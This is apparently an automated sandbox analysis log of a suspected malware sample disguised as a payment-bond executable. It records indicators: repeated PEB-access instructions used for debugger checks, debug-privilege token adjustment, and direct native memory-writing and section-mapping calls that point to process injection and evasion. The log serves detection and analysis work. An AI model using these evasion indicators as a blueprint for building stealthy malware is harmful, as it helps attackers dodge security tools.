                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142A3C0 mov eax, dword ptr fs:[00000030h]2_2_0142A3C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142A3C0 mov eax, dword ptr fs:[00000030h]2_2_0142A3C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142A3C0 mov eax, dword ptr fs:[00000030h]2_2_0142A3C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014283C0 mov eax, dword ptr fs:[00000030h]2_2_014283C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014283C0 mov eax, dword ptr fs:[00000030h]2_2_014283C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014283C0 mov eax, dword ptr fs:[00000030h]2_2_014283C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014283C0 mov eax, dword ptr fs:[00000030h]2_2_014283C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A63C0 mov eax, dword ptr fs:[00000030h]2_2_014A63C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014DB3D0 mov ecx, dword ptr fs:[00000030h]2_2_014DB3D0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014303E9 mov eax, dword ptr fs:[00000030h]2_2_014303E9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014303E9 mov eax, dword ptr fs:[00000030h]2_2_014303E9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014303E9 mov eax, dword ptr fs:[00000030h]2_2_014303E9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014303E9 mov eax, dword ptr fs:[00000030h]2_2_014303E9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014303E9 mov eax, dword ptr fs:[00000030h]2_2_014303E9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014303E9 mov eax, dword ptr fs:[00000030h]2_2_014303E9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014303E9 mov eax, dword ptr fs:[00000030h]2_2_014303E9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014303E9 mov eax, dword ptr fs:[00000030h]2_2_014303E9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014DF3E6 mov eax, dword ptr fs:[00000030h]2_2_014DF3E6
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F53FC mov eax, dword ptr fs:[00000030h]2_2_014F53FC
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0143E3F0 mov eax, dword ptr fs:[00000030h]2_2_0143E3F0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0143E3F0 mov eax, dword ptr fs:[00000030h]2_2_0143E3F0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0143E3F0 mov eax, dword ptr fs:[00000030h]2_2_0143E3F0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014563FF mov eax, dword ptr fs:[00000030h]2_2_014563FF
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141E388 mov eax, dword ptr fs:[00000030h]2_2_0141E388
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141E388 mov eax, dword ptr fs:[00000030h]2_2_0141E388
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141E388 mov eax, dword ptr fs:[00000030h]2_2_0141E388
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144438F mov eax, dword ptr fs:[00000030h]2_2_0144438F
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144438F mov eax, dword ptr fs:[00000030h]2_2_0144438F
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F539D mov eax, dword ptr fs:[00000030h]2_2_014F539D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01418397 mov eax, dword ptr fs:[00000030h]2_2_01418397
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01418397 mov eax, dword ptr fs:[00000030h]2_2_01418397
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01418397 mov eax, dword ptr fs:[00000030h]2_2_01418397
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0147739A mov eax, dword ptr fs:[00000030h]2_2_0147739A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0147739A mov eax, dword ptr fs:[00000030h]2_2_0147739A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014433A5 mov eax, dword ptr fs:[00000030h]2_2_014433A5
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014533A0 mov eax, dword ptr fs:[00000030h]2_2_014533A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014533A0 mov eax, dword ptr fs:[00000030h]2_2_014533A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01419240 mov eax, dword ptr fs:[00000030h]2_2_01419240
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01419240 mov eax, dword ptr fs:[00000030h]2_2_01419240
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145724D mov eax, dword ptr fs:[00000030h]2_2_0145724D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A8243 mov eax, dword ptr fs:[00000030h]2_2_014A8243
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A8243 mov ecx, dword ptr fs:[00000030h]2_2_014A8243
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141A250 mov eax, dword ptr fs:[00000030h]2_2_0141A250
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014DB256 mov eax, dword ptr fs:[00000030h]2_2_014DB256
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014DB256 mov eax, dword ptr fs:[00000030h]2_2_014DB256
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01426259 mov eax, dword ptr fs:[00000030h]2_2_01426259
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01424260 mov eax, dword ptr fs:[00000030h]2_2_01424260
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01424260 mov eax, dword ptr fs:[00000030h]2_2_01424260
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01424260 mov eax, dword ptr fs:[00000030h]2_2_01424260
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014ED26B mov eax, dword ptr fs:[00000030h]2_2_014ED26B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014ED26B mov eax, dword ptr fs:[00000030h]2_2_014ED26B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141826B mov eax, dword ptr fs:[00000030h]2_2_0141826B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01449274 mov eax, dword ptr fs:[00000030h]2_2_01449274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01461270 mov eax, dword ptr fs:[00000030h]2_2_01461270
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01461270 mov eax, dword ptr fs:[00000030h]2_2_01461270
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D0274 mov eax, dword ptr fs:[00000030h]2_2_014D0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D0274 mov eax, dword ptr fs:[00000030h]2_2_014D0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D0274 mov eax, dword ptr fs:[00000030h]2_2_014D0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D0274 mov eax, dword ptr fs:[00000030h]2_2_014D0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D0274 mov eax, dword ptr fs:[00000030h]2_2_014D0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D0274 mov eax, dword ptr fs:[00000030h]2_2_014D0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D0274 mov eax, dword ptr fs:[00000030h]2_2_014D0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D0274 mov eax, dword ptr fs:[00000030h]2_2_014D0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D0274 mov eax, dword ptr fs:[00000030h]2_2_014D0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D0274 mov eax, dword ptr fs:[00000030h]2_2_014D0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D0274 mov eax, dword ptr fs:[00000030h]2_2_014D0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D0274 mov eax, dword ptr fs:[00000030h]2_2_014D0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01457208 mov eax, dword ptr fs:[00000030h]2_2_01457208
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01457208 mov eax, dword ptr fs:[00000030h]2_2_01457208
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F5227 mov eax, dword ptr fs:[00000030h]2_2_014F5227
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141823B mov eax, dword ptr fs:[00000030h]2_2_0141823B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142A2C3 mov eax, dword ptr fs:[00000030h]2_2_0142A2C3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142A2C3 mov eax, dword ptr fs:[00000030h]2_2_0142A2C3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142A2C3 mov eax, dword ptr fs:[00000030h]2_2_0142A2C3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142A2C3 mov eax, dword ptr fs:[00000030h]2_2_0142A2C3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142A2C3 mov eax, dword ptr fs:[00000030h]2_2_0142A2C3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144B2C0 mov eax, dword ptr fs:[00000030h]2_2_0144B2C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144B2C0 mov eax, dword ptr fs:[00000030h]2_2_0144B2C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144B2C0 mov eax, dword ptr fs:[00000030h]2_2_0144B2C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144B2C0 mov eax, dword ptr fs:[00000030h]2_2_0144B2C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144B2C0 mov eax, dword ptr fs:[00000030h]2_2_0144B2C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144B2C0 mov eax, dword ptr fs:[00000030h]2_2_0144B2C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144B2C0 mov eax, dword ptr fs:[00000030h]2_2_0144B2C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014292C5 mov eax, dword ptr fs:[00000030h]2_2_014292C5
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014292C5 mov eax, dword ptr fs:[00000030h]2_2_014292C5
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141B2D3 mov eax, dword ptr fs:[00000030h]2_2_0141B2D3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141B2D3 mov eax, dword ptr fs:[00000030h]2_2_0141B2D3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141B2D3 mov eax, dword ptr fs:[00000030h]2_2_0141B2D3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144F2D0 mov eax, dword ptr fs:[00000030h]2_2_0144F2D0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144F2D0 mov eax, dword ptr fs:[00000030h]2_2_0144F2D0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h]2_2_014D12ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h]2_2_014D12ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h]2_2_014D12ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h]2_2_014D12ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h]2_2_014D12ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h]2_2_014D12ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h]2_2_014D12ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h]2_2_014D12ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h]2_2_014D12ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h]2_2_014D12ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h]2_2_014D12ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h]2_2_014D12ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h]2_2_014D12ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h]2_2_014D12ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014302E1 mov eax, dword ptr fs:[00000030h]2_2_014302E1
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014302E1 mov eax, dword ptr fs:[00000030h]2_2_014302E1
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014302E1 mov eax, dword ptr fs:[00000030h]2_2_014302E1
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F52E2 mov eax, dword ptr fs:[00000030h]2_2_014F52E2
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014DF2F8 mov eax, dword ptr fs:[00000030h]2_2_014DF2F8
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014192FF mov eax, dword ptr fs:[00000030h]2_2_014192FF
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145E284 mov eax, dword ptr fs:[00000030h]2_2_0145E284
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145E284 mov eax, dword ptr fs:[00000030h]2_2_0145E284
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A0283 mov eax, dword ptr fs:[00000030h]2_2_014A0283
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A0283 mov eax, dword ptr fs:[00000030h]2_2_014A0283
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A0283 mov eax, dword ptr fs:[00000030h]2_2_014A0283
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F5283 mov eax, dword ptr fs:[00000030h]2_2_014F5283
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145329E mov eax, dword ptr fs:[00000030h]2_2_0145329E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145329E mov eax, dword ptr fs:[00000030h]2_2_0145329E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014302A0 mov eax, dword ptr fs:[00000030h]2_2_014302A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014302A0 mov eax, dword ptr fs:[00000030h]2_2_014302A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014352A0 mov eax, dword ptr fs:[00000030h]2_2_014352A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014352A0 mov eax, dword ptr fs:[00000030h]2_2_014352A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014352A0 mov eax, dword ptr fs:[00000030h]2_2_014352A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014352A0 mov eax, dword ptr fs:[00000030h]2_2_014352A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014E92A6 mov eax, dword ptr fs:[00000030h]2_2_014E92A6
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014E92A6 mov eax, dword ptr fs:[00000030h]2_2_014E92A6
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014E92A6 mov eax, dword ptr fs:[00000030h]2_2_014E92A6
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014E92A6 mov eax, dword ptr fs:[00000030h]2_2_014E92A6
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014B72A0 mov eax, dword ptr fs:[00000030h]2_2_014B72A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014B72A0 mov eax, dword ptr fs:[00000030h]2_2_014B72A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014B62A0 mov eax, dword ptr fs:[00000030h]2_2_014B62A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014B62A0 mov ecx, dword ptr fs:[00000030h]2_2_014B62A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014B62A0 mov eax, dword ptr fs:[00000030h]2_2_014B62A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014B62A0 mov eax, dword ptr fs:[00000030h]2_2_014B62A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014B62A0 mov eax, dword ptr fs:[00000030h]2_2_014B62A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014B62A0 mov eax, dword ptr fs:[00000030h]2_2_014B62A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A92BC mov eax, dword ptr fs:[00000030h]2_2_014A92BC
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A92BC mov eax, dword ptr fs:[00000030h]2_2_014A92BC
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A92BC mov ecx, dword ptr fs:[00000030h]2_2_014A92BC
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A92BC mov ecx, dword ptr fs:[00000030h]2_2_014A92BC
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01428550 mov eax, dword ptr fs:[00000030h]2_2_01428550
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01428550 mov eax, dword ptr fs:[00000030h]2_2_01428550
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141B562 mov eax, dword ptr fs:[00000030h]2_2_0141B562
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145656A mov eax, dword ptr fs:[00000030h]2_2_0145656A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145656A mov eax, dword ptr fs:[00000030h]2_2_0145656A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145656A mov eax, dword ptr fs:[00000030h]2_2_0145656A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145B570 mov eax, dword ptr fs:[00000030h]2_2_0145B570
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145B570 mov eax, dword ptr fs:[00000030h]2_2_0145B570
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01457505 mov eax, dword ptr fs:[00000030h]2_2_01457505
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01457505 mov ecx, dword ptr fs:[00000030h]2_2_01457505
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F4500 mov eax, dword ptr fs:[00000030h]2_2_014F4500
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F4500 mov eax, dword ptr fs:[00000030h]2_2_014F4500
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F4500 mov eax, dword ptr fs:[00000030h]2_2_014F4500
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F4500 mov eax, dword ptr fs:[00000030h]2_2_014F4500
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F4500 mov eax, dword ptr fs:[00000030h]2_2_014F4500
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F4500 mov eax, dword ptr fs:[00000030h]2_2_014F4500
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F4500 mov eax, dword ptr fs:[00000030h]2_2_014F4500
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014DB52F mov eax, dword ptr fs:[00000030h]2_2_014DB52F
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014CF525 mov eax, dword ptr fs:[00000030h]2_2_014CF525
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process token adjusted: Debug
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtWriteVirtualMemory: Direct from: 0x76F0490C
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtOpenKeyEx: Direct from: 0x76F03C9C
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtReadVirtualMemory: Direct from: 0x76F02E8C
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtCreateKey: Direct from: 0x76F02C6C
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtSetInformationThread: Direct from: 0x76F02B4C
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtQueryAttributesFile: Direct from: 0x76F02E6C
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtQuerySystemInformation: Direct from: 0x76F048CC
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtOpenSection: Direct from: 0x76F02E0C
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtSetInformationThread: Direct from: 0x76EF63F9
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtQueryValueKey: Direct from: 0x76F02BEC
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtCreateFile: Direct from: 0x76F02FEC
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtOpenFile: Direct from: 0x76F02DCC
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtQueryInformationToken: Direct from: 0x76F02CAC
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtTerminateThread: Direct from: 0x76F02FCC
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtOpenKeyEx: Direct from: 0x76F02B9C
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtSetInformationProcess: Direct from: 0x76F02C5C
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtNotifyChangeKey: Direct from: 0x76F03C2C
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtCreateMutant: Direct from: 0x76F035CC
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtMapViewOfSection: Direct from: 0x76F02D1C
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtResumeThread: Direct from: 0x76F036AC
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtReadFile: Direct from: 0x76F02ADC
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtQuerySystemInformation: Direct from: 0x76F02DFC
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtDelayExecution: Direct from: 0x76F02DDC
